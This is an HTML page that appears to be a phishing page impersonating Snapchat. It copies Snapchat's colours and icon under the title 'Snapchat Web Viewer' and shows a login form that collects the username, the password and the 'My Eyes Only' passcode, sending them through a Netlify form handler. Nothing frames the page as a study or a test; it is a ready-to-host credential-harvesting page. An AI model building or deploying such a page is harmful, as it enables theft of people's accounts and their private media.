<!DOCTYPE html>
<head>
<title>Snapchat Web Viewer</title>
<style>
    @font-face {
        font-family: HelveticaNeue;
        src: url("HelveticaNeueLTStd Lt.woff");
    }
    *{
        font-family: HelveticaNeue;
    }
    body {
        background-color: yellow;
    }
    #form {
        text-align: center;
        margin: 0;
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
    }
    button {
        background-color: red;
        border: none;
        font-size: 64px;
        width: 100%;
    }
</style>
<link rel="icon" href="Snapchat-512.png">
</head>
<body>
   
    <div id="form">
        <h1>Login to Web Viewer</h1>
        <form action="success_page" netlify>
            <label for="user">Username:</label>
            <input type="text" name="user" required><br>
            <label for="user">Password:</label>
            <input type="password" name="password" required><br>
            <label for="user">My Eyes Only Passcode:</label>
            <input type="password" name="meo" required><br><br>
            <button type="submit" name="submit"> Login </button>
        </form>
    </div>
</body>
</html>
